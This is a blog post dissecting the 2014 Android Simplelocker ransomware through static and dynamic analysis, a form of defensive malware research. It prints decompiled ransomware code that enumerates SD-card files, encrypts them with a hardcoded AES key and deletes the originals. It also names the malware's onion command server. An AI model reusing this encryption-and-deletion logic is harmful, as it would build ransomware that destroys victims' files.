How To Dissect Android Simplelocker Ransomware

In this blog post we'll be looking at a new type of malware for Android phones that encrypts important files and demands the user pay a ransom to regain access to their phone.

This is the first reported case of ransomware being used on smartphones so I'm keen to find out more about this new malicious app.

I want to understand what this ransomware does and how it restricts the phone user from accessing files on their SD card. I'll be providing a step-by-step dissection of the malware to provide a clear explanation of how this app carries out its malicious activities.

So before we start the dissection let's look at exactly what Simplelocker is and where it came from.

What is Simplelocker?

First reported by Eset (ESET Analyzes First Android File-Encrypting, TOR-enabled Ransomware) on the 4th June 2014, Simplelocker has one goal: to encrypt certain files on the phone's SD card and then demand cash to decrypt the data - also known as ransomware.

Ransomware is a type of malware that "restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed" (see Wikipedia: Ransomware).

We've seen plenty of cases recently of ransomware infecting computer's (such as CryptoLocker and Cryptowall) but this appears to be the first case of smartphone ransomware in action.

Credit to the following articles for their explanation of the Simplelocker ransomware:

Simple Locker Ransomware Dissection

MD5: fd694cf5ca1dd4967ad6e8c67241114c

SHA256: 8a918c3aa53ccd89aaa102a235def5dcffa047e75097c1ded2dd2363bae7cf97

APK obtained from: contagiominidump.blogspot.in/2014/06/simplocker-android-file-encrypting-tor.html

This post will follow a similar form to the previous post How To Dissect Android Flappy Bird Malware, only I'll assume you've already installed the various tools required for dissection.

The tools I'll be using for this dissection are the same as the previous dissection:

DroidBox - a dynamic analysis tool that shows us what an app is doing (i.e. files/websites accessed etc) when it's running

Android Emulator (included in the Android SDK - used to run the APK file

dex2jar - a set of tools that reads Dalvik Executable (.dex/.odex) files and outputs .jar files

JD-GUI graphical utility that displays Java source codes of .jar files

For this dissection I'll still be using dynamic and static analysis, but the approach will be slightly different.

Due to the dangerous nature of ransomware it could be risky to carry out the dynamic analysis first, just in case the ransomware does something malicious to the computer. So I'll be carrying out a basic static analysis in order to determine what the app does and if it's safe to run in a virtual environment, before carrying out the dynamic analysis. I'll then return to the static analysis where we'll look at the code in greater detail and how it carries out the malicious activities.

Basic Static Analysis

The first task is to turn the APK file into a .jar file which we can then open in JD-GUI to see the Java code that's powering the ransomware.

Heading over to the console, we first want to use the tool dex2jar to convert the APK file into a .jar file. The following command should do the trick:

sh /home/user/dex2jar-version/d2j-dex2jar.sh /home/user/simplocker.apk

This should produce a .jar file which you can open in JD-GUI, producing something similar to the screenshot below:

Let's take a brief look at what this app is doing by exploring some of the class files:

Main : calls MainService

: calls MainService : calls TorService (used to connect to the anonymous TOR network)

: calls (used to connect to the anonymous TOR network) MainService : calls FilesEncryptor

: calls FilesEncryptor : encrypts all images and videos, renames their extensions to .enc

: encrypts all images and videos, renames their extensions to Constants : contains variable EXTENSIONS_TO_ENCRYPT which contains the following file extensions: "jpeg", "jpg", "png", "bmp", "gif", "pdf", "doc", "docx", "txt", "avi", "mkv", "3gp", "mp4"

: contains variable which contains the following file extensions: "jpeg", "jpg", "png", "bmp", "gif", "pdf", "doc", "docx", "txt", "avi", "mkv", "3gp", "mp4" FilesEncryptor calls AesCrypt and finds all images, videos and documents on the phone's SD card

calls and finds all images, videos and documents on the phone's SD card AesCrypt contains a method called encrypt() which uses AES encryption and cipher password " jndlasf074hr " (found in Constants )

contains a method called which uses AES encryption and cipher password " " (found in ) HTTPSender : connects to http://xeyocsu7fu2vjhxs.onion/ to send data about phone. Uses 127.0.0.1 port 9050 as proxy

: connects to to send data about phone. Uses 127.0.0.1 port 9050 as proxy Utils: gathers information such as IMEI, OS, phone model and manufacturer

In a nutshell this information tells us the following:

This app is looking for images, documents and videos to encrypt. After encrypting the files it will then rename their file extensions to .enc The app has a C&C (command and control) server on the TOR network The app collects information about the phone (IMEI, OS, phone model, manufacturer) to send to C&C server Presumably the C&C server can send decryption instructions to the app

We now have a good overall picture of how this app carries out its ransomware activities. We can also determine that's it's reasonably safe to open this app in the virtual Android environment on DroidBox, so let's move onto the next phase.

Dynamic Analysis

In this phase we want to allow the app to run in a safe environment to confirm whether or not our suspicions from the basic static analysis phase are true.

The main tool we'll use for this phase is DroidDox (refer to the previous post, How To Dissect Android Flappy Bird Malware, for installation instructions)

We'll be working on the command line for this part. Also, remember to export the Android SDK path so we can work from any directory and still have access to the SDK tools:

export PATH=$PATH:/path/to/android-sdk/tools/ export PATH=$PATH:/path/to/android-sdk/platform-tools/

Make sure you have a virtual device setup and ready to deploy in the Android Virtual Device (AVD) manager by entering the command:

android

Heading over to the DroidBox directory, we can now start the Android emulator by entering the following command:

./startemu.sh <AVD name>

Which should open up the virtual Android device with the OS loading, as seen in the screenshot below:

The Android emulator might take a minute or two to fire-up. Once it's ready, enter the following into the command line. This will install Simplelocker onto the virtual device and run the app:

./droidbox.sh simplelocker.apk

Once the app has installed, the virtual Android screen should look like the screenshot below:

This screenshot is the Simplelocker lock screen presented to the user. The text translates from Russian as follows:

WARNING your phone is locked! The device is locked for viewing and distribution child pornography , zoophilia and other perversions. To unlock you need to pay 260 UAH. 1. Locate the nearest payment kiosk. 2. Select MoneXy 3. Enter 380982049193. 4. Make deposit of 260 Hryvnia, and then press pay. Do not forget to take a receipt! After payment your device will be unlocked within 24 hours. In case of no PAYMENT YOU WILL LOSE ALL DATA ON your device!

Interestingly, the code to enter (in step 3) appears to be the same every time the app is executed.

Heading back to the command line, DroidBox should have produced an output similar to the screenshot below:

Go ahead and press Ctrl-C to to view the JSON log of data collected while the app was running.

This log shows the use of localhost 127.0.0.1 port 9051 being used for sending and receiving data, the app also accesses a lot of files.

This output didn't prove much because there's no SD card attached to the virtual Android device and therefore no files to encrypt. So let's carry out the experiment again, but this time with some files to be encrypted.

Head back to the AVD manager by entering the command Android on the command line. Open up the settings for the AVD being used for the experiment and enable the SD card with a size of 30 MiB.

The location of this SD card image should be ~/.android/avd/ /sdcard.img , so the virtual SD card can be mounted by using the following command

mount ~/.android/avd/sdcard.img -o loop /mnt/sdcard

At this point go ahead and copy onto the mounted virtual SD card some sample images ("jpeg", "jpg", "png", "bmp", "gif"), documents ("pdf", "doc", "docx", "txt") and videos ("avi", "mkv", "3gp", "mp4").

Once there are some sample files on the virtual SD card, unmount it by entering the following onto the command line:

umount /mnt/sdcard/

Now we're ready to fire up the AVD and run the app in DroidBox again:

./startemu.sh <AVD name> ./droidbox.sh simplelocker.apk

It might take the AVD a while to encrypt all the files, but after a few minutes stop the AVD and mount the virtual SD card again. All the sample files should have been encrypted and had their extensions renamed to .enc.

So at this point we can confirm that our basic static analysis turned out to be correct: this app encrypts images, documents and videos with pre-determined file extensions.

Static Analysis - Part Two

Having determined what this app does, let's find out how this app carries out its malicious activities by looking at its code in more detail.

The main function being carried out by this app is the file encryption which occurs in the classes FilesEncryptor and AesCrypt. The class FilesEncryptor contains a method called getFileNames():

private void getFileNames(File paramFile) { File[] arrayOfFile = paramFile.listFiles(); int i = 0; if (i >= arrayOfFile.length) return; File localFile = new File(paramFile.getAbsolutePath(), arrayOfFile[i].getName()); if ((localFile.isDirectory()) && (localFile.listFiles() != null)) getFileNames(localFile); while (true) { i++; break; String str1 = localFile.getAbsolutePath(); String str2 = str1.substring(1 + str1.lastIndexOf(".")); if (this.extensionsToDecrypt.contains(str2)) { this.filesToDecrypt.add(localFile.getAbsolutePath()); continue; } if (!Constants.EXTENSIONS_TO_ENCRYPT.contains(str2)) continue; this.filesToEncrypt.add(localFile.getAbsolutePath()); } }

This code extract from the ransomware iterates through all files on the SD card. Line 15 calculates the file extension of each file on the SD card and then line 16 checks if the file extension is in the list of pre-determined file extensions to encrypt (found in the class Constants).

The same class also contains a method called encrypt():

public void encrypt() throws Exception { AesCrypt localAesCrypt; Iterator localIterator; if ((!this.settings.getBoolean("FILES_WAS_ENCRYPTED", false)) && (isExternalStorageWritable())) { localAesCrypt = new AesCrypt("jndlasf074hr"); localIterator = this.filesToEncrypt.iterator(); } while (true) { if (!localIterator.hasNext()) { Utils.putBooleanValue(this.settings, "FILES_WAS_ENCRYPTED", true); return; } String str = (String)localIterator.next(); localAesCrypt.encrypt(str, str + ".enc"); new File(str).delete(); } }

This method iterates over all the files which were added to the array in the previous method (getFileNames()), as seen on line 9. Each file is encrypted on line 19 where a call is made to the encrypt() method of the AesCrypt class.

The encrypt() method from the AesCrypt class requires two parameters: name/location of file to be encrypted and name/location of the encrypted output file. Line 19 uses the name of the file (as determined by line 18) and then appends the extension .enc to the end of the file to write. Finally, line 20 deletes the original unencrypted file.

The class AesCrypt carries out the actual encryption and decryption of files. It's constructor method is shown below:

public AesCrypt(String paramString) throws Exception { MessageDigest localMessageDigest = MessageDigest.getInstance("SHA-256"); localMessageDigest.update(paramString.getBytes("UTF-8")); byte[] arrayOfByte = new byte[32]; System.arraycopy(localMessageDigest.digest(), 0, arrayOfByte, 0, arrayOfByte.length); this.cipher = Cipher.getInstance("AES/CBC/PKCS7Padding"); this.key = new SecretKeySpec(arrayOfByte, "AES"); this.spec = getIV(); }

This code snipped shows that the ransomware uses AES encryption using AES/CBC/PKCS7Padding.

The AesCrypt class contains a method called crypt() (as called earlier in FilesEncryptor's encrypt() method), this method is shown below:

public void encrypt(String paramString1, String paramString2) throws Exception { FileInputStream localFileInputStream = new FileInputStream(paramString1); FileOutputStream localFileOutputStream = new FileOutputStream(paramString2); this.cipher.init(1, this.key, this.spec); CipherOutputStream localCipherOutputStream = new CipherOutputStream(localFileOutputStream, this.cipher); byte[] arrayOfByte = new byte[8]; while (true) { int i = localFileInputStream.read(arrayOfByte); if (i == -1) { localCipherOutputStream.flush(); localCipherOutputStream.close(); localFileInputStream.close(); return; } localCipherOutputStream.write(arrayOfByte, 0, i); } }

This is where the file encryption takes places within the app. Lines 4 and 5 create variables used for the file input and output. Line 6 initialises the cipher (to encrypt data). Line 7 is where the encryption occurs and line 19 writes the encrypted byes to the output file.

Interestingly the same class also contains a method called decrypt() which is very similar to the encrypt() method:

public void decrypt(String paramString1, String paramString2) throws Exception { FileInputStream localFileInputStream = new FileInputStream(paramString1); FileOutputStream localFileOutputStream = new FileOutputStream(paramString2); this.cipher.init(2, this.key, this.spec); CipherInputStream localCipherInputStream = new CipherInputStream(localFileInputStream, this.cipher); byte[] arrayOfByte = new byte[8]; while (true) { int i = localCipherInputStream.read(arrayOfByte); if (i == -1) { localFileOutputStream.flush(); localFileOutputStream.close(); localCipherInputStream.close(); return; } localFileOutputStream.write(arrayOfByte, 0, i); } }

Obviously this method carries out the decryption on the input file and produces the decrypted output file. The same line numbers from the encrypt() method are highlighted to demonstrate how decryption occurs.

Conclusion

As previously noted by other write-ups about this ransomware: this is more of a proof-of-concept app at the moment and it has yet to be discovered on the Google Play Store. The app is also quite simple to reverse-engineer and no code obfuscation has been used.

This dissection shows how the app encrypts user's files and that information about the phone is sent to a C&C server on the TOR network.

But one important question remains unanswered: would it be possible to decrypt files that have been encrypted by the app without connecting to the C&C server? In other words: can we reverse the damage done by this app?

In the next blog post we'll look at how you can create an antidote for this ransomware.

Edit: as promised, a complete walkthrough on creating the antidote for Simplelocker (which will decrypt the files) is available in the blog post Creating An Antidote For Android Simplelocker Ransomware.

Image credit: "Google Android Amigurumi" by Kham Tran, flickr.com/photos/khamtran/5871541424/.

Rod Tue, 17 Jun 2014 02:34:49 +0000 Awesome work!

Roshin Tue, 17 Jun 2014 12:41:10 +0000 damn! awesome work dude! I've never read such a detailed explanation anywhere! keep up the good work! looking forward to more articles!

Alex Fri, 20 Jun 2014 13:34:39 +0000 I wrote decoder at 9 June =) LOL for Russia